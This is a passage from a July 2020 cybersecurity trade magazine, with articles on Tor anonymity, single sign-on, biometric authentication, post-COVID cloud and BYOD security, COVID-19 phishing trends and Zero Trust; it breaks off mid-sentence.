The Deep Web systems could get used by the media staffs in order to bring the story to the audience.

Practically, anyone sitting on the comp and writing to the journalist could get approved as the information

source to some media group for a reason he can offer the content frequently. So, that’s how the public

opinion could get created and managed and in our belief – that’s so dangerous weapon that can

compromise the media professionalism. No ethical media house would trust to anyone and before

anything is published there should be the several levels of the confirmation. In other words, anyone

looking for the exclusives on the Tor should know that he is possibly working for the other side of the law.

The Need to Hide Who You Are

Sometimes the intelligence sources reporting to some defense agency would need to hide their identity

for the security needs. The agent on the other side of the communications would deal with the clear

picture in a term who is talking to him. Also, the security organizations can confirm a lot of that, so it’s

quite clear they would be highly confident about the sources of the information. Being the source of the

findings to anyone creditable is so heavy and time consuming task and it needs the reliability, accuracy

and skill in order to get approved for such a service. Apparently, the defense staff would hide who he is

as well because it’s not necessary to know any sort of the personal details of that guy as the task is to

provide so helpful findings to the agency. How such an effort would get further directed it’s not up to the

informant – it’s only up to that defense team.

The Anonymity Information Exchange Systems

The most known privacy infrastructure worldwide is the Tor anonymity system that would cope with the

millions of users every single day. From time to time that service would get shut down, but it’s more about

such network’s configuration rules. Essentially, the Tor service can offer the good privacy and it’s mainly

reliable to its users. It would cope with the multi-level encryption, so it’s quite trickery to anyone to

challenge its security capacities. Let’s say the Tor is the quite trusted system that would attract so many

professionals from many areas of interest. Apparently, it would cope with its dark side being one of the

biggest Darknet service providers in the world. It would get the real oasis to the criminals, terrorists and

hackers as it would offer a lot of benefits to the users seeking to remain safe.

Cyber Defense eMagazineJuly 2020 Edition 98

Copyright © 2020, Cyber Defense Magazine. All rights reserved worldwide.


How Bad Guys Could Take Advantage of So

Maintaining the anonymous communications could be the real challenge and so many people across the

globe would cope with such a fact. Especially, the bad guys would know how to take advantage over

such an infrastructure as they would choose to stay invisible once the authorities come to get them. Some

of their tactics would show they would deal with so many security and privacy accounts and for such a

reason it can be difficult tracking what they really do. Indeed, there are the ways to figure out something,

but the majority of their activities would stay well-camouflaged to the investigators and intelligence officers

as they would use many accounts, many different locations and plenty of the machines getting their own

web connectivity. In so many cases, it would be even the challenge identifying the threat as the entire

search could be extremely time consuming. Once the first bad actor is found there are the better chances

to locate the rest of his network.

The Final Comments

As we said, the kids love to play the games and the adult folks could keep with those habits the later on

in their lives. Anyhow, our story can begin as quite innocent, but the impacts of the illustrated behavior

could be enormous. In our understanding, it’s time to start to think if we want to make any progress as

the human kind. The best way to use your brain cells is to observe so simple stuffs in your environment.

Once you get aware what is going on around you – you would start correlating the things with each other

and getting the rules of those linkages. The task is hard, but – in our opinion – so obtainable!

About the Author

Milica D. Djekic is an Independent Researcher from

Subotica, Republic of Serbia. She received her engineering

background from the Faculty of Mechanical Engineering,

University of Belgrade. She writes for some domestic and

overseas presses and she is also the author of the book

“The Internet of Things: Concept, Applications and Security”

being published in 2017 with the Lambert Academic

Publishing. Milica is also a speaker with the BrightTALK

expert’s channel. She is the member of an ASIS

International since 2017 and contributor to the Australian

Cyber Security Magazine since 2018. Milica's research

efforts are recognized with Computer Emergency Response

Team for the European Union (CERT-EU), Censys Press and EASA European Centre for Cybersecurity

in Aviation (ECCSA). Her fields of interests are cyber defense, technology and business. Milica is a

person with disability.

Cyber Defense eMagazineJuly 2020 Edition 99

Copyright © 2020, Cyber Defense Magazine. All rights reserved worldwide.


Everything You Want to Know About Single Sign-On

By Ayman Totounji, Founder , Cynexlink

Wikipedia defines Single sign-on or SSO as “an authentication scheme that allows a user to log in with a

single ID and password to any of several related, yet independent, software systems.”

Simply put, Single sign-on is a session or a user authentication service that allows a user to use a single

set of login credentials—username and password—for multiple applications.

Or you can say that you can gain access to several applications with just one set of passwords and

usernames.

This way, it simplifies password management for both businesses and individuals.

An example of an SSO login is Google's products. For example, if you log into Gmail, you automatically

get access to Google Drive, Google Photos, YouTube, and other Google services.

Cyber Defense eMagazineJuly 2020 Edition 100

Copyright © 2020, Cyber Defense Magazine. All rights reserved worldwide.


How it Works

Whenever you sign in to use an SSO service, the service creates an authentication token that remembers

that you are verified. This authentication token is a sort of digital information being saved either in the

user’s browsers or within the SSO service’s servers, like a temporary ID card provided to you.

Any app that you access will be authenticated by the SSO service. The SSO approves the user's

authentication token to the app and the user is granted access. But a user will be required to sign in

through the SSO service if they haven't done it yet.

However, an SSO service might not necessarily keep a user in its record, since it doesn't save user

identities. Most SSO services work by checking user credentials with a different identity management

service.

SSO just confirms whether your login credentials match with their identity in the database, without looking

after the database themselves—just like a record-keeper who can access the records easily without

having the entire catalog memorized.

I think these steps will help you understand better how Single Sign-On functions

• The website first checks to see if you have already been approved by the SSO solution so that it

can give you access to the site.

• If you haven’t, it redirects you to the SSO tool to log in.

• You are asked to fill credentials.

• The SSO solution asks your identity provider or authentication system to confirm your identity.

• The data is then transferred to the website by the SSO tool. It also takes you back to that site.

• After the sign-in process, the site verifies authentication verification data with you as you pass

through the site to confirm that you are authenticated each time you move to a new page.

What are the Benefits of Single Sign-On?

SSO lets users access all of their apps with a single set of passwords and usernames. Here I have

discussed some benefits of Single Sign-On service.

Increasing Productivity:

SSO boosts productivity. When all of the apps are placed in one convenient portal, it accelerates access

to required systems and resources.

With SSO in place, a user needs to log in once and get one-click access to all the apps they require.

Although the amount of time saved might seem small, all of the time generally spend logging into

individual resources adds up.

SSO also reduces the time users spend going through password-related hassles, since one only requires

using a single set of a password. And this can make a difference when you have to manage some 40

passwords. Isn't it?

Cyber Defense eMagazineJuly 2020 Edition 101

Copyright © 2020, Cyber Defense Magazine. All rights reserved worldwide.


Therefore, users can focus on the important tasks rather than fiddling with multiple passwords.

Minimizing Risk Associated with Bad Passwords Habits:

Passwords can cut both ways. While they fortify your data, they can be used to steal all information if

they get into the hands of a threat actor. That’s why they are also defined as a double-edged sword.

Top of that, most passwords are not easy to remember and it is time-consuming to type into each

resource you need to get into. While changing your passwords is important, it just adds to the frustration

for some users.

Enter SSO.

If you use SSO, you are less likely to type password down, repeat passwords, make simple or commonly

used passwords, or resort to other bad password practices.

Minimizing Helpdesk Costs:

Given that SSO minimizes the requirement to use the number of passwords, users are less likely to

request the IT department for password resets. This can save time and hassles as resetting a simple

password can eat up the helpdesk’s valuable time.

According to one study, 20-50% of all help desk requests are for password resets. Providing a single set

of credentials to employees will simply reduce this need.

Improving Security Efficiencies:

From the security viewpoint, it is quite obvious to be bothered by the use of the same password for all

the apps. What if your master password is stolen?

Yeah, keeping one password can make your systems vulnerable.

And it is equally true that SSO can minimize password theft if used carefully.

This is because users only need to remember a single password for many apps, meaning that they can

focus on to make that single password secure and stronger.

Plus, they are less likely to write it down, unlike in the case of multiple passwords that have to be noted

down. This way, it minimizes the risk of password theft.

Cyber Defense eMagazineJuly 2020 Edition 102

Copyright © 2020, Cyber Defense Magazine. All rights reserved worldwide.


Understanding the Types of Single Sign-On

• ENTERPRISE SINGLE SIGN-ON is considered a primary authentication, intercepting login

requests when needed by secondary applications to complete the user and password fields. This

system lets one system interacts with other systems that might disable the login screen.

• WEB SINGLE SING ON or WEB SSO works with an application which can be accessed online,

and its works to verify a user on multiple applications by eliminating the need of getting identified

again.

The proxy server then intercepts the access data as well as facilitates the communication

following the transferring the results to the computer that requested it. Unidentified users are sent

to an authentication service, returning a successful login.

• FEDERATED IDENTITY relies on an identity management solution that utilizes standards to let

application to identify clients without having them to go through the authentication process again

and again.

• OPEN ID is a decentralized SSO procedure that involves the storing of user IDS at a URL that

any server can approve.

What are the Challenges Associated with Single Sign-On

• More robust passwords should be created. This is because if an SSO account is hacked, others

under the same authentication can easily get exposed to the attack.

• A breakdown with SSO at one site can affect all the linked sites. Therefore, it is important to

choose the right SSO system. It should be reliable and equipped with the plans to deal with

interruptions.

• Your SSO is affected by the problem in your identity provider. The provider's weakness in any

kind of interruption becomes your problem as well, and it might go beyond your control. Again,

you need to work with an efficient vendor.

• If a threat actor gets into your identity provider user account, all your linked systems are easily

getting vulnerable. This can be termed as a classic single point of failure and should be addressed

in the planning process. An efficient SSO provider ensures top-notch security.

• It is not easy to set up SSO due to the different environments.

• SSO is not recommended for the multi-user computers. After all, it causes sheer inconvenience

and security issues if other users use a machine that has logged in accounts of someone.

Cyber Defense eMagazineJuly 2020 Edition 103

Copyright © 2020, Cyber Defense Magazine. All rights reserved worldwide.


• Some SSO vendors can provide their data to third parties.

How to Choose a Single Sign-On Solution

There are some key factors to consider while choosing a Single Sign-On Solution.

Personalized User Experience:

Check if the vendor lets you customize the login page to your corporate branding. After all, an efficient

single sign-on process doesn't confine the users in a box where everything looks alike.

Access to all the Apps You Require:

Make sure your sign-on vendor lets you use all the apps you require.

Security:

Security is a crucial point to look for in the vendor. Make sure they protect your password and let you

integrate with AD/LDAP for quick access to your data. Reliability is also a key as the breakdown is often

associated with these services. Therefore, make sure to work with the one who ensures nearly 100%

uptime so that you can team can access their apps when they require them.

Scalability:

SSO solutions should grow with your organization. There is no use of changing the vendors now and

then just because they are too big or too small for your needs.

Bottom Line:

So, you must have understood important things about SSO. It is a great solution to one big problem: how

to manage the increasing number of users across a big ecosystem of apps and services.

After all, it is not easy to memorize the complex passwords as we are using more systems in our routine

lives.

It lets us log in to different applications and services with just one single identity. It eliminates the need to

repeat access to each account each time you get to disconnect from the service.

However, an SSO service is not immune to some issues such as breakdown and comprised passwords.

Luckily, these things can be avoided by using strong passwords as well as working with an efficient SSO

vendor.

Cyber Defense eMagazineJuly 2020 Edition 104

Copyright © 2020, Cyber Defense Magazine. All rights reserved worldwide.


About the Author

Ayman is founder of cynexlink. When Ayman founded Cynexlink, he

had one core mission in mind: helping small- and mid-sized companies

spend more time focusing on their core businesses. Could we impress

you with his technical background? With his engineering degree from

Damascus University, as a CCNP, CCVP, CCNA, CCDA, Cisco IPTX

and VoIP specialist, being MCSE and A+ certified and having nearly 20

years of experience in enterprise network design and architecture,

network routing, switching, wireless, security, Cisco Unified messaging,

CCME, UC500 Series, voice gateway and Cisco Unity – yes, we think

we could.

Ayman can be reached online at (aat@cynexlink.com) and at our company website -

https://www.cynexlink.com

LinkedIn | Twitter | 949.668.0682

Cyber Defense eMagazineJuly 2020 Edition 105

Copyright © 2020, Cyber Defense Magazine. All rights reserved worldwide.


A Passwordless Future: Will Biometric Identification

Replace Passwords?

By Joshua Frisby, Founder of PasswordManagers.co

From Face ID to scanning your fingerprint to unlock your phone, biometric authentication is weaved into

almost every device that we rely on. It has been so seamlessly integrated that it has become somewhat

second-nature in the digitally dominant world that we live in.

While not needing to enter, or remember, a password is extremely convenient, we must ask: Will

biometric authentication replace traditional passwords altogether? And most importantly: Is it safe?

We have become so accustomed to using biometric authentication but the truth is that while biometrics

offer many advantages, it also comes with several drawbacks. Let’s take a closer look.

Is There a Need to Replace Passwords?

Login details and credentials are susceptible to theft and are often targeted by hackers. In fact, Verizon’s

Data Breach Investigations Report concluded that up to 81% of data breaches are due to hackers being

able to gain access by leveraging weak, reused, or stolen passwords. With the level of exposure to

cybercrime dependent on where you reside, having a fool-proof method to login into your accounts is

crucial to secure digital infrastructures, devices, and identities.

Cyber Defense eMagazineJuly 2020 Edition 106

Copyright © 2020, Cyber Defense Magazine. All rights reserved worldwide.


According to research conducted by LastPass, the average person can have up to 97 work-related

passwords that they need to manage, and that’s not even including personal ones. It’s no shock that so

many people reuse the same password, after all, we are only human. Unless you are a genius and have

the world’s best memory, it’s highly likely that you are going to be able to remember so many, let alone

come up with complex combinations to ensure you use unique strong passwords for each account.

With cybercrime on the rise, 55% of people would prefer a method of protecting accounts that don’t

involve passwords. Enter biometric authentication.

What Makes Biometrics a Good Alternative?

Biometric data is unique to you, making it hard to steal and imitate. And so, biometrics are a serious

contender for replacing passwords as the standard login method.

Not only are we familiar with using our biometric data (face and fingerprint) to unlock our devices and in

some cases, a handful of accounts, they also make the login process effortless. There is no need to type

usernames or long complicated passwords. Take mobile banking apps as an example, what could be

more convenient than simply scanning your finger on a reader to see your account balance? Or, even

simpler, look at your phone’s camera to unlock your device via the built-in iris scanner.

Source: Science Focus

While convenience is nice to have, security is the primary concern. Because biometrics are more difficult

to replicate than passwords, hackers cannot obtain your sensitive data with a simple phishing attack.

This makes hacking data that is protected with biometrics much more difficult than password-protected

data.

Cyber Defense eMagazineJuly 2020 Edition 107

Copyright © 2020, Cyber Defense Magazine. All rights reserved worldwide.


We’ve touched on face-scanning but it is far more sophisticated than you may think. Facial recognition is

rapidly gaining popularity and the algorithms that are used to analyze someone’s facial features are also

becoming increasingly intelligent. For example, some facial recognition applications can differentiate a

live subject from a picture, making it very difficult to spoof the facial recognition and gain unauthorized

access to protected data.

Capital is another driving force behind the development of biometrics. The biometrics market is estimated

to be worth a staggering $49 billion by 2022 and huge investments are being made in the development

of new algorithms and systems to improve biometric accuracy.

Biometric authentication was first introduced to the mass market by smartphones such as the Apple

iPhone and Samsung’s Galaxy range. Today, it is possible to use biometrics across a much broader

range of applications. However, biometrics are not limited to devices and software, we can also use them

to access physical spaces like our homes. This versatility makes for a better overall authentication

method than passwords, especially when speed, ease of login, and security are all concerns.

If biometrics are a better authentication method, why are we still using passwords? The answer is that

biometrics are not perfect and they do have significant drawbacks that need to be addressed before we

can fully embrace the passwordless revolution. While the technology is very promising and convenient,

there’s certainly room for improvement before biometrics can claim to enjoy the same popularity that

passwords do.

What Are the Drawbacks of Biometric Authentication?

While biometrics are very secure, they are also immutable.

It is important to remember that biometric data has to be stored somewhere for applications to use it as

an authentication method. The problem is that if these databases were to be hacked, your identity could

become compromised.

If your biometric data is ever compromised in one way or another, you could face serious repercussions.

You can change passwords, you can’t change biometrics.

Since biometrics can’t be changed, it would be impossible to ensure the safety of compromised accounts

once hacked. This is where passwords have the upper hand. If your password is ever lost or stolen, you

can simply log in to your account and change your credentials to make it secure again. This process can

be repeated over and over again.

Biometric authentication also comes with quite a few privacy concerns. Since biometrics inextricably link

a user’s digital and physical identity, there are concerns that biometric data could be collected and abused

by hackers. Since data privacy is a key concern, this could cap how widely biometric authentication is

accepted as more people become aware of the potential downsides.

Cyber Defense eMagazineJuly 2020 Edition 108

Copyright © 2020, Cyber Defense Magazine. All rights reserved worldwide.


Source: Apple Insider

It is also important to note that biometric authentication systems have not been around as long as

password-based systems. Consequently, they suffer from more bugs and growing pains. False positives

or negatives occur frequently, and this can lead to frustration when an authorized user is denied access

or, more seriously, when the wrong person is granted access due to a false positive identification. A

research team from New York University created an artificial intelligence platform that was able to

successfully recreate full fingerprints from partial prints. The recreated fingerprints were able to fool a

biometric authentication system 20% of the time.

Last but not least, biometric authentication systems can often be biased against users who cannot easily

submit biometrics. This includes handicapped people who may have experienced a change in their

biometric details due to an injury. For example, a badly cut finger may lead to scarring that makes a

fingerprint unrecognizable, and as a result, revokes access.

Passwords Are Here to Stay

Although the use of passwordless methods are on the rise, it seems that passwords will remain the

mainstream authentication method for the near future. So, to make using passwords as simple and

secure as possible, there are a few simple steps you can take.

Cyber Defense eMagazineJuly 2020 Edition 109

Copyright © 2020, Cyber Defense Magazine. All rights reserved worldwide.


The key to having optimal online security is to ensure that all your passwords are unique and complex.

It’s easy to base your passwords on something that is of personal significance to you such as your

birthday or the name of a loved one, but this makes passwords easy to guess and is a hacker’s dream.

Using a password generator to create complex passwords that cannot be guessed with ease is a simple

and quick way to strengthen the security of your online accounts. But, to take the security of your

passwords to the next level, you can store them in a fortified password vault cocooned in encryption.

There’s a wide range of different password managers that can facilitate the secure storage of passwords

whilst also offering the convenience of auto-filling credentials, making logging into sites as seamless as

biometric authentication.

You should also ensure that you never write down your passwords, save them in spreadsheets, or share

them over text or email. Hackers can easily exploit these unsecure methods. Changing passwords

frequently also makes your accounts more secure and helps to keep hackers at bay.

Although biometric authentication doesn’t appear to be replacing passwords in the near future, perhaps

the best authentication method is a hybrid one in which passwords and biometrics co-exist to deliver a

comprehensive security solution.

About the Author

Joshua Frisby is the Founder of PasswordManagers.co. His mission

is to help you protect your passwords. Whether you want to securely

manage passwords for personal, family, or business use,

PasswordManagers.co is here to help you stay safe. Josh can be

reached via email or LinkedIn.

Cyber Defense eMagazineJuly 2020 Edition 110

Copyright © 2020, Cyber Defense Magazine. All rights reserved worldwide.


Post COVID-19: Cloud, Remote Work and BYOD Security

Predictions

By Anurag Kahol, CTO and co-founder, Bitglass

Cloud adoption has already been growing rapidly, but we’ll see a sharp increase in adoption in

2020 as a result of the global pandemic.

Recent events have impacted businesses and schools all around the world, causing them to shift to

remote work wherever possible. Cloud adoption gives employees and students the freedom to operate

from the safety of their homes by granting remote access to needed data and services. However, even

before the outbreak, cloud adoption was outpacing the adoption of the tools needed to properly protect

data in cloud environments. In 2019, 86% of organizations deployed cloud-based tools, but a mere 34%

made use of single sign-on (SSO), a basic but critical capability for authenticating users and securing

access to corporate cloud environments. This statistic suggests deeper underlying cloud security issues

within organizations and indicates that data breaches will continue to arise around the world.

The shift to widespread remote work also increases the likelihood of insider threats.

Verizon’s 2019 Data Breach Investigation Report found that approximately 34% of breaches involved

internal actors. Additionally, a recent survey conducted on IT professionals about insider threats revealed

that only half of organizations provide user training regarding insider threats. While protecting data from

malicious external actors is typically top of mind for most organizations, the fact remains that they must

also defend against employees--whether they are malicious or merely careless.

Cyber Defense eMagazineJuly 2020 Edition 111

Copyright © 2020, Cyber Defense Magazine. All rights reserved worldwide.


Phishing attacks are not a groundbreaking threat, and general employee awareness of these schemes

has grown in recent years; however, hackers still find success with this tactic by taking advantage of

major news. In fact, the United Nations' health agency released an alert warning of an increased number

of cybercriminals posing as World Health Organization (WHO) representatives amid the current

pandemic. During this stressful time, recipients of these messages are more likely to click on malicious

URLs, open attachments, and give up personal data. Because of this, insider threats will spike and be a

leading cause of data breaches in 2020.

Businesses will implement changes to ensure BYOD devices are secure.

A majority of organizations (85%) were already somewhat prepared for remote work by enabling bring

your own device (BYOD) policies. On the flipside, not all companies that have adopted BYOD are doing

so securely. For example, 43% of businesses do not know if the devices employees are using to access

corporate data are infected with malware--demonstrating a disturbing lack of visibility. By the end of 2020,

we will likely see even higher BYOD adoption rates--whether out of necessity for enabling remote work,

or simply for BYOD’s many benefits, including enhanced mobility, efficiency, and employee satisfaction.

Regardless, when companies enable BYOD, they must also implement agentless security measures that

can protect corporate data on personal devices. With agentless tools, IT gains security and compliance

without invading user privacy through agents on employees’ personal endpoints. As organizations

increasingly realize that cybersecurity must be a top priority, we predict that the use of agentless security

solutions will rise alongside that of BYOD.

About the Author

Anurag is the CTO and co-founder of Bitglass where he

expedites the company’s technology direction and

architecture. Anurag was director of engineering in Juniper

Networks’ Security Business Unit before co-founding Bitglass.

Anurag received a global education, earning an M.S. in

computer science from Colorado State University, and a B.S.

in computer science from the Motilal Nehru National Institute

Of Technology.

Cyber Defense eMagazineJuly 2020 Edition 112

Copyright © 2020, Cyber Defense Magazine. All rights reserved worldwide.


The Rise of COVID-19 Phishing Attacks: How Cyber

Adversaries Are Adopting Phishing to Generate New

Threat Vectors

By Brad Slavin, CEO of DuoCircle LLC

While COVID-19 has locked all people in their homes, with office premises closed, cyber adversaries

seem to have a field day using the pandemic as a launchpad for phishing attacks. Organizations and

individuals must be aware of the detective, preventive, and protective measures to safeguard their

information assets against these attacks.

As the COVID-19 pandemic assumes global proportions, it is natural for people to become anxious.

People naturally turn to the internet to acquire the latest information on the coronavirus related drugs,

vaccines, etc. At the same time, social engineering attacks have been on the rise as malicious actors

worldwide keep developing sophisticated tools and techniques to entice employees as well as individuals

to reveal sensitive and confidential information, such as personally identifiable information (PII), financial

data, or user account credentials. Let's dive deep into the gravity of the situation before discussing what

the best anti-phishing solutions and techniques are that organizations and individuals can make use of.

Some Hard Facts and Statistics on Phishing Attacks Based On COVID-19

Researchers reveal that cybercriminals are primarily employing three ingenious phishing attack

methodologies to target victims. They are brand impersonation, scamming, and business email

compromise (BEC). Here are a few spine-chilling statistics on COVID-19 phishing scams that have made

headlines around the world.

Cyber Defense eMagazineJuly 2020 Edition 113

Copyright © 2020, Cyber Defense Magazine. All rights reserved worldwide.


• There has been an unprecedented rise in phishing scams with more than 854,000 confirmed

phishing and counterfeit web-pages reported in Q1 of 2020. Besides, more than 4 million pages

fall in the category of suspicious pages.

• The alarming issue is that nearly 30% of these confirmed phishing pages (approximately more

than a quarter of a million) pertain to COVID-19 alone.

• Though the first COVID-19 related phishing scam surfaced by the end of January 2020, the figure

for March 2020 alone is 9,116, a 667% increase over February 2020.

• Eighteen million malware and phishing emails and more than 240 million COVID-19-related spam

email messages are sent over Gmail daily.

• Citizens in the US have lost somewhere around $12 million to coronavirus phishing attacks. And

in the UK, it's over £2 million.

Healthcare - The Most Vulnerable Industry Domain to Phishing Attacks

COVID-19 has kept the entire world on tenterhooks. The FUD (the fear, uncertainty, and doubt) and the

non-availability of a reliable cure or vaccine is the primary reason for the panic created in people's minds.

Thus, when they encounter an email message seemingly originating from an influential source like the

US Center for Disease Control and Prevention, WHO, or other prominent health agencies, people rarely

check their authenticity. Recently, there has been a surge of phishing emails sent by these malicious

actors impersonating healthcare professionals and organizations, making healthcare one of the most

vulnerable sectors in coronavirus times.

Offer for Loans and Grants - The Most Effective COVID-19 Phishing Attack

The pandemic has thrown the world economy in disarray. It has affected almost every segment of society.

Under these circumstances, people eagerly look forward to Governmental aid such as EMI moratoriums,

loans, and other giveaways. Malicious actors have been taking advantage of these situations and are

trying to lure people to fictitious websites, where the unsuspecting users end up providing vital information

leading to severe data breaches. These attacks are seen in the form of phishing emails, ransomware, or

banking malware attacks.

Cyber Defense eMagazineJuly 2020 Edition 114

Copyright © 2020, Cyber Defense Magazine. All rights reserved worldwide.


Donation Solicitations - The Most Dangerous COVID-19 Phishing Scam

Global pandemics like COVID-19 bring out the humanitarian side of people in a substantial way.

Generally, people donate generously towards their respective National Disaster Relief Funds, and

research funds set up by their governments. There have been numerous incidents of cybercriminals

taking advantage of such philanthropic activities. One of the most notorious modus operandi is to design

fundraising pages that not only mislead users into donating money but also steal sensitive personal

information. Using such information, like names, email addresses, phone numbers, credit card details,

and internet banking usernames and passwords, these malicious actors accept money using the names

of disaster relief funds.

COVID-19 Vaccine and Cure Scam - The Most Ingenious COVID-19 Phishing Attack

While researchers are struggling to find an antidote for the coronavirus, numerous fake websites

advertising medicines and vaccines have sprung up on the internet. More than 20,000 new COVID-19-

related domains have been registered in the past few weeks. These websites also claim to sell COVID-

19 personal protective kits like face masks, sanitizers, hand gloves, medical combinations like

Hydroxychloroquine, Remdesivir, and so on. Such fraudulent websites ask for the full payment in

advance and unsuspecting people end up parting with their money only to discover that they have been

a victim of cybercrime. Amazon itself reported over a million fake products in this category over the past

couple of months.

Detective, Preventive and Protective Measures Individuals & Enterprises Can Adopt

Cybercriminals play on the psychology of the victim by pushing in email messages with COVID-19 related

information that come along with a malicious attachment or infectious URL. Knowing some of these

threats could be the best defense in thwarting such attempts:

• Reliance on Trusted Sources: Rely on authentic or official websites to get reliable information and

updates about the coronavirus. Be scrupulous in clicking on the links provided on articles and

blogs that share information on COVID-19.

• Refrain from The Temptation To Click/Download: Sometimes, ignoring unsolicited emails is the

best phishing prevention method. Downloading or opening malicious attachments or clicking on

an infectious URL allows malicious actors to gain access to network systems.

• Knowing the Phishing Techniques: The latest tactic deployed by malicious actors is to set up live

tracker websites from which people can purportedly get live coronavirus updates. Though the

websites appear legitimate, they are scamming attempts that end up with the user compromising

their confidential information.

• Phishing Protection Solutions: The best way to deal with phishing threats is to install a trusted

anti-phishing solution to thwart any attempt made by adversaries.

Cyber Defense eMagazineJuly 2020 Edition 115

Copyright © 2020, Cyber Defense Magazine. All rights reserved worldwide.


• Phishing Awareness: Phishing awareness training plays an integral part in safeguarding

information assets. Enterprises should educate and train their employees, customers, and thirdparty

vendors on types of phishing, anti-phishing techniques, and phishing prevention best

practices, etc.

Post COVID-19 – What Does the Future Look Like?

With the lockdown restrictions in place almost everywhere, a significant proportion of people already have

their presence online, from shopping, ordering food, and essential items to work from home. The shift to

a virtual workplace has become more pronounced than before, as a majority of online businesses are

already allowing their employees to WFH, which are likely to follow suit post COVID-19 as well,

considering the numerous benefits and overall increase in the productivity of the employees.

As a downside, though, cyber adversaries have seized the opportunity to target as many people as

possible. Hence, one can expect a surge in phishing attacks and scams in times to come. Therefore, one

should exercise extreme caution and neutralize the vulnerabilities to mitigate the information risks

encountered because of COVID-19. Deploying an effective anti-phishing solution is the need of the hour

to tackle these attacks better, and has never been so significant.

About the Author

Brad Slavin,CEO of DuoCircle LLC. Brad Slavin is a security

industry veteran and the General Manager at DuoCircle LLC a cloud

email security firm. Before joining DuoCircle, Brad began his career

in network security by founding a regional ISP in California and was

the cofounder of wireless wardriving and security software

Netstumber.com; Which was the recipient of the "Editor's Choice" -

Laptop Magazine & Ziff-Davis i3 Award for innovation.

Brad can be reached online at https://www.linkedin.com/in/bradslavin/ and our company website

https://www.phishprotecion.com

Cyber Defense eMagazineJuly 2020 Edition 116

Copyright © 2020, Cyber Defense Magazine. All rights reserved worldwide.


Post COVID-19: Password Extinction Accelerated;

Telemedicine Spurs Fraud

By Robert Prigge, CEO of Jumio

Passwords will become extinct much faster than predicted.

As the COVID-19 pandemic pushed more of us to self-isolate, Zoom became the go-to teleconferencing

platform. In fact, Zoom went from 10 million daily meetings in December to 300 million today.

Unfortunately, this surge in popularity came with a price tag — a lack of data privacy. Now, there are over

500,000+ stolen Zoom logins floating around the dark web for just .002 cents each. And this is just

opening the door for account takeover (ATO) attacks via credential stuffing — a type of cyberattack where

automated bots use those stolen account credentials to gain unauthorized access to user accounts. And

Zoom is not alone. We’ve also seen a rash of account takeover attempts aimed at users of Microsoft’s

proprietary Remote Desktop Protocol (RDP), striking millions per week.

With data collected and sold on the dark web containing usernames and passwords from past breaches,

and internet users often recycling the same login credentials across multiple platforms, cybercriminals

have all of the tools they need to impersonate a user’s identity online. This means that if your online

account is only protected by a username and password, then you’re likely going to be an ATO target. As

a result, password-based authentication, multi-factor authentication (2FA) and knowledge-based

authentication (KBA) will be a thing of the past much sooner than previously anticipated, and businesses

will look to more sophisticated and secure login options for current and prospective users.

Cyber Defense eMagazineJuly 2020 Edition 117

Copyright © 2020, Cyber Defense Magazine. All rights reserved worldwide.


Telemedicine will open up new threat vectors for fraud.

Given the health concerns involved with physically visiting a doctor or hospital during COVID-19, patients

have been urged to stay home unless symptoms are considered severe. Because of this, telemedicine

has been the most viable resource for those seeking medical counsel during this time. Unfortunately

there have also been over 3,000 healthcare-related breaches that have impacted more than 500 million

medical records in the past decade, a trend that has been escalating year-over-year. Due to the high

amount of personal information, medical records command a high value on the dark web and can be

listed for up to $1,000 each, 10 times more than the average credit card data breach record.

Cybercriminals can then easily obtain this information and impersonate legitimate patients.

This stolen information can also be used to obtain free medical or dental care. Because of this, CIOs will

scramble to ensure procedures are in place so that doctors know their patients are who they say they are

—and this is the domain of the emerging field of Know Your Patient (KYP). This means healthcare

provider organizations need to adopt identity safeguards similar to the Know Your Customer (KYC)

regulations adopted by the financial service industry.

About the Author

Robert Prigge is responsible for all aspects of Jumio’s business and

strategy. Specializing in security and enterprise business, he held C-level

or senior management positions at Infrascale, Secure Computing,

McAfee, Quest Software, Sterling Commerce and IBM. Robert can be

reached online via LinkedIn, on Twitter @rprigge and at Jumio’s website,

www.jumio.com.

Cyber Defense eMagazineJuly 2020 Edition 118

Copyright © 2020, Cyber Defense Magazine. All rights reserved worldwide.


The Future Of Security – Predictions Post COVID-19

By Mike Riemer, Pulse Secure, Global Chief Security Architect

The Future of Work post COVID-19 - Larger Remote Workforce with Cybersecurity Built into the

Culture

“A recent Gartner survey of over 300 CFO’s found that 74% of respondents say they expect to move

previously on-site employees to remote post-COVID-19. As such, a large remote workforce is forcing

companies to re-evaluate how to evolved their corporate culture and invest in capital. Embedding a longterm

cybersecurity strategy as part of this evolution to keep workers safe will be critical.

Ultimately, an effective security culture mitigates the risk of a breach as a result of credential theft,

phishing and business email compromise (BEC) – and working with employees to protect their privacy

addresses a growing issue for many people, 28% of whom have had their identity hacked or stolen. That

number increases to 35% when looking at the entire U.S.

However, as businesses are quick to ditch their office spaces, they will need to allow employees to have

secure remote access to corporate systems as well as implement Zero Trust. Zero Trust is an approach

based on the concept of continuous verification and authorization. It ensures that only authenticated

users with compliant devices, whether corporate, personal or public, can connect to authorized

applications over any network, whether on-premises or in the cloud. This will help remote workers to

engender more confidence that their business and personal data is secure. “

Zero Trust Must be Part of the Future of Work During and Post COVID-19

“The need for Zero Trust security has never been greater, especially due to increased targeted attacks,

rapid work from home mandates, and mounting privacy compliance obligations due to COVID-19. As

such, enterprise adoption of the Zero Trust security model is growing as mobility and hybrid IT models

Cyber Defense eMagazineJuly 2020 Edition 119

Copyright © 2020, Cyber Defense Magazine. All rights reserved worldwide.


have placed most workloads beyond the shelter of corporate networks and traditional perimeter defense.

This creates significant user access and data concerns.

The 2020 Zero Trust Progress Report by Pulse Secure revealed that nearly a third of cybersecurity

professionals have expressed value in applying Zero Trust to address hybrid IT security issues. This

report, which surveyed more than 400 cyber security decision makers, found that 72% of organizations

plan to assess or implement Zero Trust capabilities in some capacity in 2020 to mitigate growing cyber

risk, while nearly half (47%) of cyber security professionals lack confidence applying a Zero Trust model

to their Secure Access architecture.

With its principle of user, device and infrastructure verification before granting conditional access based

on least privilege, Zero Trust holds the promise of vastly enhanced usability, data protection and

governance and must be part of any security architecture as we navigate the current COVID-19 business

landscape.”

Telemedicine and Remote Field Offices are Changing the Needs of Healthcare Professionals

“Healthcare is going the way of other industries with employees being asked to work remotely and post

COVID-19, we believe the use of telemedicine and remote field offices will be the new normal in

healthcare.

As such, IT teams must provide healthcare workers with mobile devices that are protected, even on

expanded Wi-Fi networks or cellular networks as employees are often working outside secure networks,

opening their mobile devices to additional threats.

Increasing remote capacity on network protections such as VPNs, extends security to those workers in

the field, ensuring that both patient information as well as other personal information stored on those

